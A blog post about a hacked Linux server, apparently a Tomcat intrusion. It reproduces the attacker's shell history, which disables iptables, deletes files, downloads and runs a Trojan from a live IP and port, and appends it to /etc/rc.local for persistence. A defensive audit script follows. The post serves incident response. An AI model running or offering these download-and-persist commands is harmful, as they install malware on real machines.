Yesterday one of the company's servers suddenly stopped responding to ping and SSH. The IDC reported that the server was sending out a large number of packets and that CPU usage showed 200%. Looking at the processes with ps aux, the following abnormal files showed up:
./liun2.3/tmp/liun2.3/tmp/liun2.3hzzta.pl
At first I thought that killing these processes and deleting the executables would be enough, but a few minutes later the program was running again.
So I ran crontab -l to check for scheduled tasks. Nothing.
Then more /etc/crontab to see whether any scheduled tasks were defined there. Also nothing.
Then it occurred to me: since the file had been executed, would .bash_history have a record of it?
cd
more .bash_history
/etc/init.d/iptables stop
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
chmod 0775 /usr/bin/rm
killall java-2013
killall wins2
killall liun2.1
killall liun2.0
rm -f -r /etc/wins
rm -f -r /etc/java-2013
rm -f -r /etc/java-2013/java-2013
rm -f -r /etc/liun2.1/liun2.1
rm -f -r /etc/liun2.1
mkdir /etc/liun2.1
cd /. /tmp
wget http://60.174.234.107:1974/liun2.3
chmod 0755 liun2.3
chmod 0755 ./liun2.3
./liun2.3
echo "cd /. /tmp ">>/etc/rc.local
echo " chmod 0755 liun2.3 ">>/etc/rc.local
echo " chmod 0755 ./liun2.3 ">>/etc/rc.local
echo "./liun2.3 ">>/etc/rc.local
(The same sequence of commands, from "/etc/init.d/iptables stop" through the last echo into /etc/rc.local, then appears a second time in the history.)
The above are the attacker's operations during the intrusion. Note in particular
wget http://60.174.234.107:1974/liun2.3
which downloads the Trojan program directly, and the echo lines that append it to /etc/rc.local so it starts again on every boot.
Searching further, I found a Trojan launcher script in the init.d directory: DbSecuritySpt.
In rc1.d, rc2.d, rc3.d, rc4.d, rc5.d and rc6.d, links had been set up pointing to init.d/DbSecuritySpt.
An executable named sgb had been created under /usr/bin/.
Finally, when searching for files matching liun*, I found files such as liun2.3 and liun2.3h in the Tomcat webapps directory.
My initial judgement was that this came in through a Tomcat vulnerability, so I ran security checks on Tomcat, disabled the services that had been attacked and changed some port numbers.
The service is running again now, but is there still a backdoor? How did my server get hacked? I have no idea. I only learned Linux halfway and lack Linux security knowledge. The purpose of this post is to find out whether other friends have run into the same kind of attack. The Trojan site is http://60.174.234.107:1974. If any expert sees this post, please help me work out how to find this backdoor or the infected files.
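As an added example (not from the original post, and not the author's script), a small POSIX shell audit that checks the two autostart mechanisms the bash_history above revealed: lines appended to /etc/rc.local that work out of /tmp, and init.d scripts linked into runlevels 1 and 6, where real services are not started. The sample tree, the /usr/bin/sgb launcher content and the DbSecuritySpt/sshd link layout are constructed for the demo.

```shell
#!/bin/sh
# Persistence audit over a root tree ($1, default /). It looks for the two
# autostart tricks seen in this post: commands appended to /etc/rc.local that
# cd into /tmp, chmod or run a relative ./binary, and init.d scripts with
# start (S*) links in rc1.d or rc6.d, runlevels real services do not start in.
# One finding per line on stdout.
audit_persistence() {
    root="${1:-/}"
    if [ -f "$root/etc/rc.local" ]; then
        while IFS= read -r line; do
            case "$line" in
                */tmp*|*chmod*|./*|*" ./"*) echo "rc.local: $line" ;;
            esac
        done < "$root/etc/rc.local"
    fi
    for lvl in 1 6; do
        for link in "$root/etc/rc$lvl.d"/S*; do
            [ -L "$link" ] || continue
            echo "rc$lvl.d: $(basename "$link") -> $(readlink "$link")"
        done
    done
}

# Constructed sample tree (not a real host): rc.local tampered as in the post,
# an init.d launcher named DbSecuritySpt linked into rc1.d/rc3.d/rc6.d, plus a
# normal sshd script linked only into rc3.d, which the audit must not flag.
make_sample_tree() {
    root="$1"
    mkdir -p "$root/etc/init.d" "$root/etc/rc1.d" "$root/etc/rc3.d" "$root/etc/rc6.d"
    printf '%s\n' '#!/bin/sh' 'touch /var/lock/subsys/local' \
        'cd /tmp' 'chmod 0755 ./liun2.3' './liun2.3' > "$root/etc/rc.local"
    printf '#!/bin/sh\n/usr/bin/sgb &\n' > "$root/etc/init.d/DbSecuritySpt"
    printf '#!/bin/sh\necho sshd\n' > "$root/etc/init.d/sshd"
    for lvl in 1 3 6; do
        ln -s ../init.d/DbSecuritySpt "$root/etc/rc$lvl.d/S97DbSecuritySpt"
    done
    ln -s ../init.d/sshd "$root/etc/rc3.d/S55sshd"
}

# Usage: sh audit.sh /        (audit the live system)
#        sh audit.sh --demo   (build the sample tree in a temp dir and audit it)
if [ "${1:-}" = "--demo" ]; then
    demo=$(mktemp -d) && make_sample_tree "$demo" && audit_persistence "$demo"
    rm -rf "$demo"
elif [ -n "${1:-}" ]; then
    audit_persistence "$1"
fi
```

On the sample tree it reports the three tampered rc.local lines and the DbSecuritySpt links in rc1.d and rc6.d, while the sshd link in rc3.d is left alone; a hit on a live host still needs to be confirmed by reading the script and checking the binary it launches.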
This article is from the "Fat notes" blog; please keep this source when reposting: http://pangz.blog.51cto.com/1865802/1433461